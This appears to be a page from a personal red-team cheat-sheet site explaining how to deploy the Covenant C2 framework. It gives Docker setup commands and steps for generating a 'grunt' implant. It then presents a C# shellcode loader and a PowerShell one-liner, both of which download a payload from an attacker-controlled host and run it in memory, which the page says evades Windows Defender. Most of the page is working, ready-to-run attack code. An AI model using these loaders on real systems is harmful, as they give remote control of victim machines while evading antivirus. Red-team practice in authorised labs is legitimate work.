👾
ctrl-z
  • 👋Welcome to ctrl-z
  • Cheat Sheets
    • Helpful Command QR
    • Footprinting
    • Information Gathering
    • File Transfers
    • LFI
    • MetaSploit
      • Using msfconsole
      • Creating Metasploit Payloads
    • Shells
      • Shells and Payloads
      • Shell Cheatsheet
    • Password Attacks
    • Attacking Common Services
    • Pivoting & Port Forwarding
    • Web Attacks
      • SQL
        • MySQL & SQLi
        • SQLmap
      • Fuzzing w FFUF
      • Bruteforce w Hydra
      • XSS
    • Active Directory
      • Intro to AD
      • AD Enum&Attack
      • RPC-Client
      • 🥝mimikatz
      • NTLM Relay Attacks
    • 💢Buffer Overflow
    • Priv Esc
      • Linux Priv Esc
      • Windows Priv Esc
        • mimikatz
  • Tools
    • Containers
      • Kubernetes
      • Container Testing Methodology
      • Dropping Kali in your test space
    • Cloud
      • aws cli
    • Command Line
      • Linux Basic CML
      • Windows CML
      • Mac CML
    • Redteam & C2
      • Covenant C2
    • JS Deobuscation
    • Crackmapexec
  • Scripts
    • Priv Esc
  • Loot
  • Write Ups
    • Inject (active at the time)
Powered by GitBook
On this page
  1. Tools
  2. Redteam & C2

Covenant C2

Covenant is a C2 framework written in .NET core, which makes it cross-platform and easy to use. We will set this up in a docker. Clone the dev branch and then build the docker.

PreviousRedteam & C2NextJS Deobuscation

Last updated 2 years ago

git clone --recurse-submodules [https://github.com/cobbr/Covenant](https://github.com/cobbr/Covenant) -b dev
cd Covenant
docker build -t covenant .
sudo docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v /path-to-Covenant/Data:/app/Data covenant

You can reuse the same container later with the following command: sudo docker start covenant -ai

Payload and Launcher creation

Navigate to Listeners and create a new listener on port 80. Make sure that the ConnectAddress is set to the VPN/VM address. Next, go to Launchers and select BinaryLauncher . Set DotNetVersion to 4.0 and the Name to grunt . The Delay can be reduced to 3. Generate and download the binary, then use donut to convert it to shellcode.

Now compile following C# code, which will load this shellcode and execute it.

using System;
using System.Net;
using System.Runtime.InteropServices;

namespace Reflection
{

		public class Program
		{

				public delegate void grunt();
				[DllImport("kernel32.dll")]
				public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwsize, uint
flNewProtect, out uint lpflOldProtect);

				public static void Main()
				{

						var wc = new WebClient();
						var sc = wc.DownloadData("http://(your ip):8080/grunt.bin");

						GCHandle pinned = GCHandle.Alloc(sc, GCHandleType.Pinned);
						IntPtr ptr = pinned.AddrOfPinnedObject();
						Marshal.Copy(sc, 0, ptr, sc.Length);

						uint lpflOldProtect;
						VirtualProtect(ptr, (UIntPtr)sc.Length, 0x40, out lpflOldProtect);

						grunt exec = Marshal.GetDelegateForFunctionPointer<grunt>(ptr);
						exec();

				}

		}
}

The code above pins the shellcode into memory, makes it executable and then executes it. This can be compiled with mono on Linux.

apt install mono-mcs
mcs payload.cs

Once the compilation succeeds, copy the following PowerShell code for the launcher.

$bytes = (new-object net.webclient).downloaddata('http://(your ip):8080/payload.exe')
[System.Reflection.Assembly]::Load($bytes)
[Reflection.Program]::Main()

This will load the binary in memory and execute it via reflection.

Browsing to will bring us to the Covenant UI. Create a new account and then cd Cologin. We will be generating a binary and converting it to shellcode using . This will let us evade Windows Defender and inject this to get grunts.

https://127.0.0.1:7443
donut
LogoGitHub - cobbr/Covenant: Covenant is a collaborative .NET C2 framework for red teamers.GitHub